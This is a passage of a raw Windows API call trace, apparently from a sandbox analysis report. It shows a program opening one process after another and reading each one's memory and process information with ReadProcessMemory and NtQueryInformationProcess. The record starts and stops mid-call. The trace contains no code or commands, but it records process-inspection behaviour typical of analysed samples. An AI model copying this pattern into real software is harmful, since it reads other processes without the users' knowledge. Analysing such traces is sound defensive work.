hProcess=0x28c, lpBaseAddress=0x505018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.319] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.319] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1ca0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.319] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1888, lpBuffer=0x138c580, nSize=0x78, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.320] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.320] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.320] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x505020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.320] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.320] malloc (_Size=0x80) returned 0xd9d190 [0264.320] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2a1900, lpBuffer=0xd9d190, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.321] free (_Block=0xd9d190) [0264.321] CloseHandle (hObject=0x28c) returned 1 [0264.322] _ui64tow_s (in: _Value=0xec8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3784") returned 0x0 [0264.322] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3784") returned 4 [0264.322] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.322] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.323] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec8) returned 0x28c [0264.323] GetLastError () returned 0x0 [0264.323] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.323] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2ee018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.324] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.324] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1f1c70, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.324] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1f1888, lpBuffer=0x138c580, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.324] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.325] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.325] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2ee020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.325] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1f1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.325] malloc (_Size=0x70) returned 0xd9d190 [0264.325] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1f18f0, lpBuffer=0xd9d190, nSize=0x6e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.326] free (_Block=0xd9d190) [0264.326] CloseHandle (hObject=0x28c) returned 1 [0264.326] _ui64tow_s (in: _Value=0xec0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3776") returned 0x0 [0264.326] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3776") returned 4 [0264.327] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.327] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.328] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xec0) returned 0x28c [0264.328] GetLastError () returned 0x0 [0264.328] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.328] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3d9018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.328] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.329] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1cd0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.329] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1888, lpBuffer=0x138c580, nSize=0x88, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.329] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.330] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.330] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3d9020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.330] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.330] malloc (_Size=0x90) returned 0xd9d190 [0264.330] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x1e1910, lpBuffer=0xd9d190, nSize=0x8e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.331] free (_Block=0xd9d190) [0264.331] CloseHandle (hObject=0x28c) returned 1 [0264.331] _ui64tow_s (in: _Value=0xcc8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3272") returned 0x0 [0264.332] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3272") returned 4 [0264.332] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.332] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.333] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xcc8) returned 0x28c [0264.333] GetLastError () returned 0x0 [0264.333] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.333] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x359018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.333] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.334] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591ce0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.334] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591888, lpBuffer=0x138c580, nSize=0x8c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.334] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.335] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.335] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x359020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.335] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.335] malloc (_Size=0x94) returned 0xd9d190 [0264.335] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x591914, lpBuffer=0xd9d190, nSize=0x92, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.336] free (_Block=0xd9d190) [0264.336] CloseHandle (hObject=0x28c) returned 1 [0264.336] _ui64tow_s (in: _Value=0xeb8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3768") returned 0x0 [0264.337] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3768") returned 4 [0264.337] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.337] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.338] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xeb8) returned 0x28c [0264.338] GetLastError () returned 0x0 [0264.338] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.338] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x56d018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.338] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.338] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x781cc0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.339] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x781888, lpBuffer=0x138c580, nSize=0x7e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.340] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.340] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.340] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x56d020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.340] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x781270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.340] malloc (_Size=0x86) returned 0xd9d190 [0264.340] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x781906, lpBuffer=0xd9d190, nSize=0x84, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.341] free (_Block=0xd9d190) [0264.341] CloseHandle (hObject=0x28c) returned 1 [0264.342] _ui64tow_s (in: _Value=0x424, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1060") returned 0x0 [0264.342] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1060") returned 4 [0264.342] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.342] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.343] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x424) returned 0x28c [0264.343] GetLastError () returned 0x0 [0264.343] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.344] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4ed018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.344] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.358] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271c40, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.358] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271888, lpBuffer=0x138c580, nSize=0x56, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.359] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.359] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.359] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4ed020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.359] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x271270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.359] malloc (_Size=0x5e) returned 0xdb02d0 [0264.360] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2718de, lpBuffer=0xdb02d0, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb02d0*, lpNumberOfBytesRead=0x0) returned 1 [0264.360] free (_Block=0xdb02d0) [0264.360] CloseHandle (hObject=0x28c) returned 1 [0264.361] _ui64tow_s (in: _Value=0x30c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="780") returned 0x0 [0264.361] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="780") returned 3 [0264.361] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.361] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.362] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x30c) returned 0x28c [0264.362] GetLastError () returned 0x0 [0264.362] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.362] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x239018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.363] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.363] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.363] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561888, lpBuffer=0x138c580, nSize=0x5e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.363] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.363] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.363] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x239020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.363] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x561270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.364] malloc (_Size=0x66) returned 0xdafe70 [0264.364] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5618e6, lpBuffer=0xdafe70, nSize=0x64, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafe70*, lpNumberOfBytesRead=0x0) returned 1 [0264.365] free (_Block=0xdafe70) [0264.365] CloseHandle (hObject=0x28c) returned 1 [0264.365] _ui64tow_s (in: _Value=0xc54, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="3156") returned 0x0 [0264.365] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="3156") returned 4 [0264.365] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.366] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.366] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc54) returned 0x28c [0264.367] GetLastError () returned 0x0 [0264.367] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.367] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x32f018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.367] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.367] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.367] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1888, lpBuffer=0x138c580, nSize=0x62, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0264.368] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0264.369] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0264.369] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x32f020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0264.369] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a1270, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0264.369] malloc (_Size=0x6a) returned 0xd9d190 [0264.369] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4a18ea, lpBuffer=0xd9d190, nSize=0x68, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xd9d190*, lpNumberOfBytesRead=0x0) returned 1 [0264.370] free (_Block=0xd9d190) [0264.371] CloseHandle (hObject=0x28c) returned 1 [0264.371] _ui64tow_s (in: _Value=0x51c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="1308") returned 0x0 [0264.371] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="1308") returned 4 [0264.372] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0264.372] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0264.378] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x51c) returned 0x28c [0264.378] GetLastError () returned 0x0 [0264.378] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0264.378] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x59d018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0264.378] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0264.378] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7d1c60, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0264.379] ReadProcessMemory (in: hProcess=0x28c, 